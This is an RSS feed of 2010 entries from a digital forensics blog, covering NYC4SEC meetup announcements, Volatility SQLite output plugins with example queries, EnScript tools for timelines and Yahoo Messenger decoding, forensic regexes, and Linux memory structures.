<item><title>NYC4SEC Meeting 11/17/2010</title><description>Secuobs.com : 2010-11-17 15:51:53 - JL's stuff - There is an NYC4SEC meeting tonight (11/17/2010). This month our speaker is Professor Nasir Memon, who will be giving a presentation on digital image forensics. Description below. "Photo Forensics: There is More to a Picture Than Meets the Eye". When presented with a device full of active or deleted data, what do you know about the images? Can you recover them all? Can you tell which camera they are taken with? Can you tell if they are manipulated? Can you find from the Internet all other pictures taken from the same camera? Forensics professionals all over the world are increasingly encountering such questions. Given the ease by which digital images can be created, altered, and manipulated with no obvious traces, digital image forensics has emerged as a research field with important implications for ensuring digital image credibility. This presentation provides an overview of recent developments in the field, focusing on three problems. First, collecting image evidence and reconstructing them from fragments, with or without missing pieces. This involves sophisticated file carving technology. Second, attributing the image to a source, be it a camera, a scanner, or a graphically generated picture. The process entails associating the image with a class of sources with common characteristics (device model) or matching the image to an individual source device, for example a specific camera. Third, attesting to the integrity of image data. This involves image forgery detection to determine whether an image has undergone modification or processing after being initially captured. So please join us on Wednesday, November 17th, 7:00pm at John Jay College - Forensic Computing Program and the Center for Cybercrime Studies, 899 Tenth Avenue - btwn 58th &amp; 59th, Room 610T - 6th Floor. Don't forget to RSVP! Thanks to Douglas Brush, Joe Garcia, Prof. Bilal Khan and Prof. Douglas Salane for making this possible.</description><link>http://www.secuobs.com/revue/news/265517.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/265517.shtml</guid></item>
<item><title>Upcoming NYC4SEC Meeting 10/27/2010</title><description>Secuobs.com : 2010-10-19 18:07:32 - JL's stuff - We have another NYC4SEC meetup next week on October 27th. Halloween Edition - Are those knocks on your firewall doors for tricks or treats? Either way, you have to realize one of the largest threats to your environment is the human element, and none other than super malware and security forensicator Lenny Zeltser will be giving us a special Halloween talk about how attackers can trick you or the people inside your organization to get access to treats. Ok, no more puns. John Jay College has reached out and offered to host this and future events for NYC4SEC, so let's spread the word and show them that the NYC cyber security community is strong in numbers and appreciates their support.

Lenny Zeltser - "Knock, Knock: How Attackers Use Social Engineering to Bypass Your Defenses". Why bother breaking down the door if you can simply ask the person inside to let you in? Social engineering works, both during penetration testing and as part of real-world attacks. This talk explores how attackers are using social engineering to compromise defenses. It presents specific and concrete examples of how social engineering techniques succeeded at bypassing corporate security defenses. Lenny Zeltser will review how attackers have bypassed technological controls by making use of social engineering techniques. Attend this engaging talk to improve the relevance of your security awareness training and to adjust your defenses by revisiting your perspective of the threat landscape.

John Jay College - Forensic Computing Program and the Center for Cybercrime Studies, 899 Tenth Avenue (btwn 58th &amp; 59th), Room 610T - 6th Floor. More details and RSVP here: NYC4SEC RSVP. Thanks to Douglas Brush, Joe Garcia, Prof. Bilal Khan and Prof. Douglas Salane for making this possible.</description><link>http://www.secuobs.com/revue/news/258263.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/258263.shtml</guid></item>
<item><title>Updated Volatility SQLite plugins</title><description>Secuobs.com : 2010-09-17 15:54:35 - JL's stuff - I have recently updated the Volatility sqlite3 plugins (for the 1.3.2 branch) with some minor changes: 1) removal of the path from the image name; 2) lowercasing of all processes, dlls, filenames, modules etc. To make things even more interesting, I have converted some of the scanning code to output in sqlite3 as well.

$ tar -cvzf vol_sql-0.3.tgz vol_sql-0.3
vol_sql-0.3/
vol_sql-0.3/connections_2.py
vol_sql-0.3/connscan2sql.py
vol_sql-0.3/dlllist_2.py
vol_sql-0.3/driverscan2sql.py
vol_sql-0.3/files_2.py
vol_sql-0.3/filescan2sql.py
vol_sql-0.3/getsids.py
vol_sql-0.3/modscan2sql.py
vol_sql-0.3/modules_2.py
vol_sql-0.3/pslist_2.py
vol_sql-0.3/psscan3sql.py
vol_sql-0.3/sockets_2.py
vol_sql-0.3/sockscan2sql.py

Schema:
CREATE TABLE connections (pid integer, local text, remote text, memimage text);
CREATE TABLE connscan2 (pid integer, local text, remote text, memimage text);
CREATE TABLE dlls (pname text, pid integer, cmdline text, base text, size text, path text, memimage text);
CREATE TABLE driverscan2 (paddr text, objtype text, pointers integer, handles integer, start text, size text, srvckey text, driver text, path text, memimage text);
CREATE TABLE files (pid integer, file text, num integer, memimage text);
CREATE TABLE filescan2 (paddr text, objtype text, pointers integer, handles integer, access text, file text, memimage text);
CREATE TABLE modscan2 (file text, base text, size text, name text, memimage text);
CREATE TABLE modules (file text, base text, size text, name text, memimage text);
CREATE TABLE process (pname text, pid integer, ppid integer, thrds text, hndl text, ctime text, memimage text);
CREATE TABLE psscan3 (pid integer, ppid integer, ctime text, etime text, offset text, pdb text, pname text, memimage text);
CREATE TABLE sids (pname text, pid integer, sid_string text, sid_name text, memimage text);
CREATE TABLE sockets (pid integer, port integer, proto text, ctime text, memimage text);
CREATE TABLE sockscan2 (pid integer, port integer, proto text, ctime text, offset text, memimage text);

So what kinds of queries could we make with the output of these plugins? Here are a few brief examples.

Suppose you want to focus on one pid:
select * from files where pid = &lt;pid&gt;;
select * from connections where pid = &lt;pid&gt;;
etc.

Suppose you want to link up connections output with the process information:
select process.pname, connections.* from connections join process where process.pid = connections.pid order by connections.pid;

Suppose you have information from more than one image in your database and want to see if there are any dlls/processes/files in one image not represented in the others:
select * from dlls where path not in (select path from dlls where memimage is not "&lt;image name&gt;");

Suppose you don't care about dlls with a certain path, like winsxs for example:
select * from dlls where path not in (select path from dlls where memimage is not "&lt;image name&gt;") and path not like '%winsxs%';

Want to output all files in alphabetical order?
select * from files order by file;
Or by PID?
select * from files order by pid;

Now that we have sqlite output for some of the scanning plugins, we can quickly compare for information missing from the regular plugins. Here's an example of pslist vs psscan3 on an image released by Moyix in his post releasing psscan3:
select psscan3.pid, psscan3.ppid, psscan3.ctime, psscan3.pname from psscan3 where pid not in (select pid from process) order by pid;
0|0||idle
592|360|Sat Nov 15 23:42:56 2008|csrss.exe
660|616|Sat Nov 15 23:42:56 2008|services.exe
828|660|Sat Nov 15 23:42:57 2008|svchost.exe
924|660|Sat Nov 15 23:42:57 2008|svchost.exe
992|660|Sat Nov 15 23:43:25 2008|alg.exe
1016|660|Sat Nov 15 23:42:57 2008|svchost.exe
1696|1516|Wed Nov 26 07:43:28 2008|network_listene

Well, I'm sure you can think up a lot more crazy queries as well. The older sqlite plugins' usage can be found here. The newly converted plugins' usage is:
$ volatility &lt;plugin&gt; -f &lt;image&gt; -d &lt;sqlite db&gt;
At some point I'll cover output rendering in the 1.4 branch, which is more interesting :-) Until then, happy hunting!</description><link>http://www.secuobs.com/revue/news/248917.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248917.shtml</guid></item>
<item><title>Upcoming NYC4SEC Meeting 9/16/10</title><description>Secuobs.com : 2010-09-17 15:54:35 - JL's stuff - The next NYC4SEC meeting will take place on September 16, 2010 at 7:00PM at Pace University. Details: Grab your Trapper Keepers (I'm rockin' the red Lambo), your Saved By the Bell book covers and Garbage Pail Kids cards to stick on the inside of your locker, because it's back to school time. Pace University is our gracious host, and our speaker will be Ovie Carroll, who will be in town teaching a SANS Forensics 408 (Computer Forensic Essentials) course here in NYC and offered to stop by after a day of training to meet our group. If you would like to attend the 408 course, Ovie has provided a special offer for a class discount: use "COINS-OC" to get 10% off and to make sure to get into class: http://www.sans.org/new-york-forensics-2010-cs/description.php?tid=4207. More details to follow on the specific room location for the NYC4SEC Meet-up, but please get your parents to sign off on your NYC4SEC permission slips for Thursday, September 16th, 7pm. Thanks to Douglas Brush and Joe Garcia for arranging this event. More details can be found here: http://www.nyc4sec.info/calendar/14520625</description><link>http://www.secuobs.com/revue/news/248916.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248916.shtml</guid></item>
<item><title>Misc Forensic News</title><description>Secuobs.com : 2010-07-26 06:37:06 - JL's stuff - I'm somewhat behind in my blogging. In the past couple of weeks a few things of interest have come out. Here are some highlights: Moyix released psscan3, a robust process scanner. He also released GDI Utilities for taking screenshots of memory dumps, which is VERY cool :-) Lenny Zeltser released REMnux, a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and includes Volatility in its arsenal. Detective Cindy Murphy published a guide on cell phone examinations, which is definitely worth a read. My former boss and GSI alum, Jon Stewart (Mr. EnScript), has written two posts on the 3 laws of EnScript, with a third post surely coming soon. If you care anything about EnScript programming, these posts are definitely worth a read. There have been some updates to some of the Sysinternals tools that you might want to check out. F-Response now supports Android, which is pretty cool. You can check out their blog post, which includes details and a video. Into the Boxes is currently looking for collaborators for 0x2. Don't be shy, I know there are a lot of people out there who could contribute an article for the next edition. If you have an idea for an article, hit the call box.</description><link>http://www.secuobs.com/revue/news/243767.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/243767.shtml</guid></item>
<item><title>The Next HOPE and NYC4SEC</title><description>Secuobs.com : 2010-07-15 22:12:51 - JL's stuff - We will have another NYC4SEC meetup after Chris Pogue's talk on Sniper Forensics at The Next HOPE. You can RSVP here. Details: This is the NYC4SEC after-HOPE Meet-up for Sunday, July 18th at 6pm at Stout NYC on 33rd St (btwn 6th &amp; 7th), just across the street from the Hotel Pennsylvania. Informal meet-up to hang out and mingle to talk about the highlights of the HOPE conference. I spoke with Chris Pogue, who will be presenting at the conference on Sunday at 4pm - "Sniper Forensics - Changing the Landscape of Modern Forensics and Incident Response" - and he said he will stop by to join us. Check out Chris's blog: http://thedigitalstandard.blogspot.com. C'mon by to drink, talk and hang with others in the NYC InfoSec community. Thanks to Douglas Brush for setting this up :-)</description><link>http://www.secuobs.com/revue/news/240931.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/240931.shtml</guid></item>
<item><title>Briefly: Moving of stuff</title><description>Secuobs.com : 2010-07-12 02:52:27 - JL's stuff - Since access to my QC website has now expired, I've moved some of the stuff that was linked to there from this blog to here. Future misc scripts will be dumped there as well.</description><link>http://www.secuobs.com/revue/news/239554.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/239554.shtml</guid></item>
<item><title>Very Briefly: CEIC</title><description>Secuobs.com : 2010-05-25 18:17:53 - JL's stuff - Some people have asked me about CEIC. I will not be attending this year, unfortunately. I hope those of you who are currently there are having a blast though :-)</description><link>http://www.secuobs.com/revue/news/225495.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/225495.shtml</guid></item>
<item><title>Extremely Off Topic - Google "Feeling Lucky"</title><description>Secuobs.com : 2010-03-16 03:37:46 - JL's stuff - Just a bit of nonsense I discovered today. Notice a theme?</description><link>http://www.secuobs.com/revue/news/201983.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/201983.shtml</guid></item>
<item><title>GNB's Timeline EnScript</title><description>Secuobs.com : 2010-02-15 04:46:41 - JL's stuff - A former colleague of mine, Geoff Black, has a pretty cool timeline EnScript (zip file) available on his website. I have been playing around with it for a little bit and have meant to blog about it for a while. The contents of the zip are as follows:

Timeline Report.EnPack
Timeline Report.EnScript (actual code)
Timeline_Report_README.pdf
Timeline_Report_WHATSNEW.pdf
Include/GNB_HTMLlib.EnScript (library file)
Include/GNB_XMLlib.EnScript (library file)

I must say that it's nice that Geoff has given us the code to his Timeline script so that one can modify it as desired. It's also nice that he includes README and WHATSNEW files so you can have something to reference for past and present versions. Simply unzip these items (without the pdfs) into your EnCase X EnScript folder and you are ready to go. You can run the script by either double clicking the EnPack or the EnScript; just make sure to add a disk image to the case first :-) When you run it you will see the following. There are a lot of options you can choose. Here's a closeup of the interface itself. You can pick a certain time period with a start and stop date for the timeline (boxed in blue). You can pick the type of output you want (boxed in pink): whether you want Records, Bookmarks, a Tab Delimited report (TSV), how many entries you'd like in each TSV file and whether or not you would like an HTML report better suited for IE or Firefox. There are more Script Options and Time Options (boxed in green) that allow you to select files you want in the timeline report (default is all files) and which time entries you are interested in seeing (default is all). You can modify the order of the Output Fields (boxed in red) for the TSV file or remove fields that are not of interest. Other fields are self explanatory. While the script is running you can see the progress bar at the bottom right. If you choose the HTML report option you may end up with several HTML files (depending on how many files are selected and how many entries per file you have selected), and if this is the case each file is named in order, for example: TimelineReport-FF.html, TimelineReport-FF2.html, TimelineReport-FF3.html and so on. You can see an example report below. The latest change is highlighted, but you can see that some files might have the same time stamp for different fields. In this case the file will be listed twice, once with Created highlighted and once with Accessed highlighted (from the README). You can check out some of Geoff's other EnScripts and CEIC presentations at his website: http://www.geoffblack.com/forensics</description><link>http://www.secuobs.com/revue/news/191874.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/191874.shtml</guid></item>
<item><title>Yahoo Messenger EnScripts</title><description>Secuobs.com : 2010-02-14 22:28:05 - JL's stuff - There are a couple of publicly available Yahoo Messenger EnScripts/EnPacks out, such as: Yahoo Decoder in unallocated by Lance Mueller; YahooMessenger-Parser by Paul Bobby. Pretty useful scripts, however they don't handle right-to-left languages like Hebrew and Arabic. Here are some before pics from my test run with Hebrew: Lance Mueller's script's output; Paul Bobby's script's output. As you can see (well, if you know what Hebrew letters are supposed to look like), the letters come out as some gobbledy-gook. This is something I've been meaning to comment on for a while, having written various chat EnScripts at the beginning of my GSI employment. I have just gotten around to it now. The "encryption" method is the same for all unicode languages in that it is a byte-by-byte xor with the local username. The problem is that the encoding becomes distorted when it is just saved in a string. For example the letters ש and ל with encodings d7a9 and d79c respectively become c397 and c2a9 (it is left as an exercise for the reader to figure out why). So here comes a solution that I have used in the past. The EnScripting language has a class called MemoryFileClass, which allows you to have in-memory buffers that you can treat as files. You can create them, open them, read and write to them as you would any other file. So the idea is simple enough: write to a memory buffer as you decrypt the message and then extract the message after all decryption has taken place. This is accomplished by adding a couple of helper functions to Paul Bobby's code:

bool WriteBuffer(MemoryFileClass &amp;file, char msg) {
  file.SetCodePage(CodePageClass::ANSI);
  int temp = msg;
  file.WriteBinaryInt(temp, 1);
  return file.IsValid();
}

void ReadBuffer(MemoryFileClass &amp;file, String &amp;msg) {
  file.SetCodePage(CodePageClass::UTF8);
  file.Seek(0);
  file.ReadString(msg);
}

Now we can just call the functions as appropriate when decrypting and outputting the messages. You can see the correct output after this modification below (yeah, the conversation is lame and is just a test :-) The complete modified EnScript is available on the GSI forum (registration required): A thread on the GSI forum with Paul Bobby's fixed EnScript.</description><link>http://www.secuobs.com/revue/news/191827.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/191827.shtml</guid></item>
<item><title>Briefly: Volatility News (2/14)</title><description>Secuobs.com : 2010-02-14 17:36:42 - JL's stuff - I'm a little behind in my blogging, but I wanted to post about a few items that people might not have noticed. So here it is, just in time for Valentine's Day.

Volatility SQL Plugins. I modified the Volatility SQL output plugins slightly. I changed the schema in the dlllist_2.py plugin (memory_plugins/dlllist_2.py):
Table Name: dlls
pname        Process name (changed)
pid          Process ID
cmdline      Command Line text
base         Base Address
size         Size
path         Path of DLL
memimage     Memory image information was extracted from

I also removed the Volatility files (vutils.py and commands.py) since there were two patches that address the items I changed in those files. So now all you have to do is download Volatility from the SVN and unzip the plugins like before. For the more adventurous, the SQL rendering plugins have been incorporated into the experimental branch of Volatility (thank you Scudette). You can download all branches with the following command:
svn checkout http://volatility.googlecode.com/svn/branches Vol_All
For the experimental branch (located in the experimental folder) you must have Python 2.6 installed.

Volatility User Manual. There is a new Volatility User Manual contributed to the VDP by Mark Morgan. It is a compilation of past VDP articles and blog posts and covers all public plugins to date. Shouts to Mark!

EnCase EnScripts + Volatility = Takahiro Haruyama's Memory Forensics Toolkit. Takahiro Haruyama has released a new version of his Memory Forensics Toolkit. I had played around with his previous version. Now there is no excuse for the EnCase reliant not to get in on memory forensics :-) Shouts to Takahiro for making it easier for these users!</description><link>http://www.secuobs.com/revue/news/191795.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/191795.shtml</guid></item>
<item><title>Briefly: Memory Analysis EnScripts</title><description>Secuobs.com : 2010-02-07 23:11:31 - JL's stuff - I came across a post for the Memory Forensic Toolkit EnScript in the GSI Forum a few days ago. I finally got a chance to play around with it a little today, and this will be a very brief overview. Prerequisite: EnCase 6.14 or higher. Simply download the toolkit from the link above and unzip it into your EnCase X.XX EnScripts folder. You should see something like the following in your EnScript pane, with a Windows 7 folder and Windows XP (I have only tested the XP scripts at this time). EnScripts available:
- PsList: list of all processes
- KMList: show all kernel modules
- ConnList: view all TCP connections
- VadSearch: search a process's VAD for a string
- DllList: show the DLLs imported by a process
- OpenFiles: a list of files the process has open
- ProcDump: extract the process in exe format
- PsScan: enumerates process information (EPROCESS)
- ConnScan: enumerates TCP connection information (TCPT_OBJECT)
- KMScan: enumerates kernel module information (LDR_MODULE)
- Vtypes: Win32 x86 library used by the above scripts
You can run these EnScripts on raw memory dumps; just make sure to check the blue box for the memory dump you would like to run the EnScript against. Just double click the script you'd like to run. Here's an example run of PsList. And ConnScan. The output is very similar to Volatility and goes to the console by default. You can easily modify the script to output to a text file, Excel spreadsheet or any other output type you can think about, however. For some EnScripts like dlllist, you are prompted for a PID to run it against. You can modify the script to run against all PIDs, however, if desired. There is also a Microsoft Crash Analyzer which I have yet to try.</description><link>http://www.secuobs.com/revue/news/189458.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/189458.shtml</guid></item>
<item><title>Forensic Regexes</title><description>Secuobs.com : 2010-02-07 20:15:45 - JL's stuff - The other day on the #volatility channel we were discussing how it might be nice to have a list of Perl regexes for common things like IP addresses etc. Here are a few items we came up with:

IP Address: ((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)
MAC Address: ([a-fA-F0-9]{2}[:-]){5}[a-fA-F0-9]{2}
URL: (http|https|ftp|mail)://\w+
Email: [A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}

You can find some other regex expressions on the SANS blog; however, the regex expression for IP addresses there matches items like 999.999.999.999, which we know is not a valid IP address. There's a nice post by geek00l listed at the bottom of the SANS post which links to other interesting posts. Other references of interest: Regular-Expressions.info Regex Reference. What would you like to add to the list?</description><link>http://www.secuobs.com/revue/news/189430.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/189430.shtml</guid></item>
<item><title>Cybercrime Studies: File Carving for Forensics Recovery</title><description>Secuobs.com : 2010-01-29 05:35:28 - JL's stuff - There is an upcoming talk at John Jay College that should be interesting. File Carving for Forensics Recovery. Nasir Memon, Professor of Computer Science, Director of the Information Systems and Internet Security (ISIS) Lab, Polytechnic Institute of New York University. As the number of digital devices in use continues to increase, there has also been an increase in the seizure and analysis of digital data for forensic purposes. One of the areas of high forensic interest is in the recovery of digital data from devices. In cases where the file system information for a digital device is missing or corrupt, newer data recovery techniques involving a process known as file carving are used to recover the data. This talk describes the need for and evolution of file carving, and presents the various technologies that have been used to improve file carving recovery, including our own Smart Carving techniques. Date: Tuesday, February 9, 2010. Time: Reception 1:45pm, Lecture 2:00pm. Location: Room 630T, Haaren Hall, 899 Tenth Avenue, New York City 10019. RSVP: Nicole Daniels at 212-237-8920 or email ndaniels@jjay.cuny.edu. For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, at 212-237-8836 or email dsalane@jjay.cuny.edu.</description><link>http://www.secuobs.com/revue/news/186542.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/186542.shtml</guid></item>
<item><title>Volatility's Output Rendering Functions</title><description>Secuobs.com : 2010-01-12 06:35:12 - JL's stuff - Lately I've been playing around writing plugins for Volatility. A few of these will be released at the end of this blog post; some others are still in the works to be released later. During the writing of some of the more complicated plugins, I decided that I needed to have some temporary storage while doing complex processing. Sure, I could dump to a file and process that later, but why not do it within Volatility itself? SQLite is good for this. There's an option to use an in-memory database (:memory:) that will remain in memory until the process dies. I also started thinking that some people might like to have a SQLite database of all the information they could get from a memory image, for various reasons. Hence this is what the first release of plugins is all about. Luckily Volatility has an option for plugins to have more than one output option. If you look at the code in forensics/commands.py you'll see the following (line numbers included):

82 function_name = "render_%s" % self.opts.output
83 if not self.opts.out_file:
84     outfd = sys.stdout
85 else:
86     outfd = open(self.opts.out_file,'w')

This allows plugins to have more than one output function. For example, a plugin might have a render_text function that would print to stdout as usual, a render_html function that prints out in html style, a render_sql function that does some SQL actions, etc. etc. The framework allows the user to pick which output option(s) he wants and the output file on the command line, as defined in vutils.py:

45 def get_standard_parser(cmdname):
...
59     op.add_option('-H','--output',default = 'text',
60         help='(optional, default="text") Output format (xml, html, sql)')
61     op.add_option('-O', '--out_file', default=None,
62         help='(output filename to write results onto - default stdout)')

Therefore, if there is a plugin that has an xml output option, it can be invoked from the command line like so:
$ volatility &lt;plugin&gt; -H html -O &lt;outfile&gt; -f mem.dd
Quite cool :-)

Plugin Structure. If you are interested in writing plugins for Volatility, you really should read Andreas Schuster's slides. They go into nice detail on how to write plugins for the framework. Here I will simply give you the gist :-) The "skeleton" for the plugins is defined in forensics/commands.py. Items of interest include the help() function, which is the plugin description you see when you run Volatility with the help option ($ volatility -h). Also of interest is the parser() function, which allows the plugin to modify its command line options. There is also the calculate() function, which is where the real work is done. The last item of our interest is the execute() function, which allows us to calculate and collect the desired data from the memory image and then output it using the plugin's chosen render_* function. The plugins I'm releasing now consist of core commands (defined in vmodules.py) that have been converted to this code structure so I could have more than one type of output for each of these commands. The plugins in this package are:
memory_plugins/connections_2.py
memory_plugins/dlllist_2.py
memory_plugins/files_2.py
memory_plugins/modules_2.py
memory_plugins/pslist_2.py
memory_plugins/sockets_2.py

Schema. The schema for these plugins is quite simple and not much different than the original output for these core commands. There is an extra field for the name of the memory image that was analyzed, in case someone would like to place information for more than one memory image into a SQLite database. This may change at some point, and of course you are free to change it as you like. It's enough for what I needed, however.

connections_2.py Schema
Table Name: connections
pid          Process ID
local        Local connection information
remote       Remote connection information
memimage     Memory image information was extracted from

memory_plugins/dlllist_2.py Schema
Table Name: dlls
image_file_name    Process name
pid                Process ID
cmdline            Command Line text
base               Base Address
size               Size
path               Path of DLL
memimage           Memory image information was extracted from

memory_plugins/files_2.py
Table Name: files
pid          Process ID
file         Open file
num          Number of times file is open by pid
memimage     Memory image information was extracted from

memory_plugins/modules_2.py
Table Name: modules
file         Module Path
base         Base Address
size         Size
name         Module Name
memimage     Memory image information was extracted from

memory_plugins/pslist_2.py
Table Name: process (pname text, pid integer, ppid integer, thrds text, hndl text, ctime text, memimage text)
pname        Process Name
pid          Process ID
ppid         Parent Process ID
thrds        Threads
hndl         Handle Count
ctime        Creation Time
memimage     Memory image information was extracted from

memory_plugins/sockets_2.py
Table Name: sockets
pid          Process ID
port         Port
proto        Protocol
ctime        Creation Time
memimage     Memory image information was extracted from

Installation. First, make sure you have the Volatility code from the SVN. Download the plugins from here. A listing of the plugins is as follows:
$ tar -tzf vol_sql.tgz
vutils.py
forensics/commands.py
memory_plugins/connections_2.py
memory_plugins/dlllist_2.py
memory_plugins/files_2.py
memory_plugins/modules_2.py
memory_plugins/pslist_2.py
memory_plugins/sockets_2.py
Make a backup of your vutils.py and forensics/commands.py files if you like. I had to make a small modification to both of these files to get the plugins working properly. Then place the tar file into your Volatility directory and type:
$ tar -xvzf vol_sql.tgz
Each of the redefined core commands ends with "_2", so pslist becomes pslist_2 and connections becomes connections_2 and so on. So if I wanted to dump the output of the connections_2 plugin to a SQLite file I would type the following:
$ volatility connections_2 -H sql -O test.db -f mem.dd
After running all of the new commands to the same SQLite3 file, I can then look at what I have stored:

$ sqlite3 test.db
SQLite version 3.5.9
Enter ".help" for instructions
sqlite&gt; .table
connections  dlls  files  modules  process  sockets
sqlite&gt; .schema
CREATE TABLE connections (pid integer, local text, remote text, memimage text);
CREATE TABLE dlls (image_file_name text, pid integer, cmdline text, base text, size text, path text, memimage text);
CREATE TABLE files (pid, file, num, memimage);
CREATE TABLE modules (file text, base text, size text, name text, memimage text);
CREATE TABLE process (pname text, pid integer, ppid integer, thrds text, hndl text, ctime text, memimage text);
CREATE TABLE sockets (pid integer, port integer, proto text, ctime text, memimage text);
sqlite&gt; select * from files where pid = 4 and file like '%SEC%';
4|\WINDOWS\system32\config\SECURITY|1|/home/levy/forensic/evidence/10.vmem
4|\WINDOWS\system32\config\SECURITY.LOG|1|/home/levy/forensic/evidence/10.vmem
sqlite&gt; .quit

You can make as many complex queries as you like now :-)</description><link>http://www.secuobs.com/revue/news/180521.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/180521.shtml</guid></item>
<item><title>Briefly: Misc News</title><description>Secuobs.com : 2010-01-03 02:32:52 - JL's stuff - Into the Boxes Issue 0x0 is now out. It contains a small article on Linux memory forensics I wrote, as well as a cool article on Windows 7 UserAssist Registry Keys by Didier Stevens, a hardware quick tip and FTK Imager quick tip by Don C. Weber, and a PCI interview with Harlan Carvey. For those who are interested in contributing to future publications, check out the Collaboration Box. Congratulations to Don and Harlan on the first release! There is a new meetup group that I am helping to organize: NYC4Sec. The group consists of computer security, forensics and compliance professionals based in the Tri-State area, and we will be meeting to discuss the latest trends in threats and responses as well as what to do when attacked. We are aiming to meet at the end of the month. Feel free to sign up and come to the meeting. If anyone is interested in presenting at the meeting, please contact myself or Morton Swimmer. I have also been asked to give a talk at CEIC 2010. So if you are planning to attend, I'll see you there :-)</description><link>http://www.secuobs.com/revue/news/177594.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/177594.shtml</guid></item>
<item><title>Linux Memory Forensics: task_struct</title><description>Secuobs.com : 2009-12-20 20:51:28 - JL's stuff - A while back, I started blogging about /dev/kcore and had gotten up to the task_struct structure, promising to continue talking about it. Well, it's been a while since, but I have not forgotten. This will take more than one post to finish it up, however. Today we will start with a brief introduction. Later posts will continue our exploration, concluding with some small real demonstrations. task_struct: So what is the task_struct structure? It's a structure that contains information about what a process is doing. It allows the kernel to keep track of processes that are running, the states they are in, as well as other information needed by that process during execution. States of the process are also defined in include/linux/sched.h and let the kernel know if the process is running (TASK_RUNNING), interruptible (TASK_INTERRUPTIBLE), uninterruptible (TASK_UNINTERRUPTIBLE), stopped (TASK_STOPPED), being traced by a debugger (TASK_TRACED), or exiting (EXIT_ZOMBIE, EXIT_DEAD). The task_struct structure also contains identifying information such as the process PID and thread group leader ID. There are also pointers to the parent process' task_struct structure and the real_parent task_struct structure for debugging purposes. Also contained in the task_struct structure is information about other relationships the current process has, such as children or siblings. The executable name including the path is also stored in task_struct, as well as current directory information and file descriptors. The signal_struct structure contains information regarding signals for this process as well as the tty associated with it. Also contained in the task_struct is the mm_struct, which contains pointers to vm_area_structs, which are areas of virtual memory. We will discuss mm_struct and vm_area_struct next time. References: Rusling, D. Virtual Memory, The Linux Tutorial. http://www.linux-tutorial.info/modules.php?name=MContent&amp;pageid=322. Bovet, D., M. Cesati (2000). Understanding the Linux Kernel. Cambridge: O'Reilly Media.</description><link>http://www.secuobs.com/revue/news/174395.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/174395.shtml</guid></item>
<item><title>Audience Participation Time</title><description>Secuobs.com : 2009-12-20 17:46:36 - JL's stuff - While catching up on some reading over at Harlan's blog, I started thinking about all of the programming I've done in the past year or so. I really appreciate all of the hard work that goes into developing programs like RegRipper and countless others. It's cool when people are able to share tools they have developed to solve problems they have encountered in the field. It's also cool when people who are in the field are able to solve the problems themselves. I have been thinking about whether or not someone who is working in the field of digital forensics really needs to know a programming language or not. My thoughts are yes (which is influenced by what I see around me and may be biased, considering that I do a lot of programming), but I can see how some people may think differently. The reason why I bring this up is because this question has been in the back of my mind since my last discussion with someone from my alma mater, John Jay College. John Jay's MS in Forensic Computing has been established since 2004 and it has been evolving ever since its conception. The courses of the program have roughly contained a lot of hands on labs as well as theory (algorithms, cryptography, network protocols etc.) and programming (various scripting, C, Linux OS) in addition to Criminal Justice courses on laws regarding digital evidence. The question has come up several times as to whether or not the theoretical and programming courses are needed in the background of someone who wants to be a forensic examiner. When I was in attendance there, the general feeling from some (not all) of my colleagues was that they didn't need to learn programming and theory in order to work as a forensic examiner. They said they only needed to learn how to use tool XXX or YYY and get a certification in A, B, and/or C and they would be set. Perhaps they were right in some way, as they went on to find jobs where that was enough for them. The debate continues about the direction of the program and whether or not theory and programming are needed and whether or not some kind of certification should be obtained instead. Having been out in the "real world" for a little while, I see a lot of people who do not need any programming knowledge whatsoever to fulfill their jobs. There are plenty of tools that they are more than proficient in using, and I'm not knocking their skills, because they are really quite knowledgeable at what they do. However, there are many times that tool XXX or tool YYY doesn't do whatever it should normally, or it cannot fulfill the job the way the client would like. Having a little programming knowledge helps out immensely in these cases. In addition to the EnScripts I have written at work, I have written a lot of Perl scripts, *nix scripts, Visual Basic programs, SQL queries etc. to get the job done. I have also taken someone else's code in language X, Y or Z and tweaked it to run the way I needed it to for a particular job. Now I concede that it's not every day that I need to write these customizations, but it happens enough that I'm glad I can do it. I often hear from colleagues at work or elsewhere that they wish they knew how to program in X or Y so they could write their own tools to do something. I have suggested books or websites from which they could glean this wanted knowledge. This often comes with some (stern) advice that they must also practice programming if they want it to stick. Some have taken my advice, some probably just don't have the time for it. So after much rambling on the subject, what do you think? How often do you wish/are you glad that you knew how to program? How often would it have helped you/does it help you on your job as a forensic examiner/incident responder? Don't be afraid to comment; I only moderate to keep down on the spam (which I seem to get a lot of for some reason).
</description><link>http://www.secuobs.com/revue/news/174384.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/174384.shtml</guid></item>
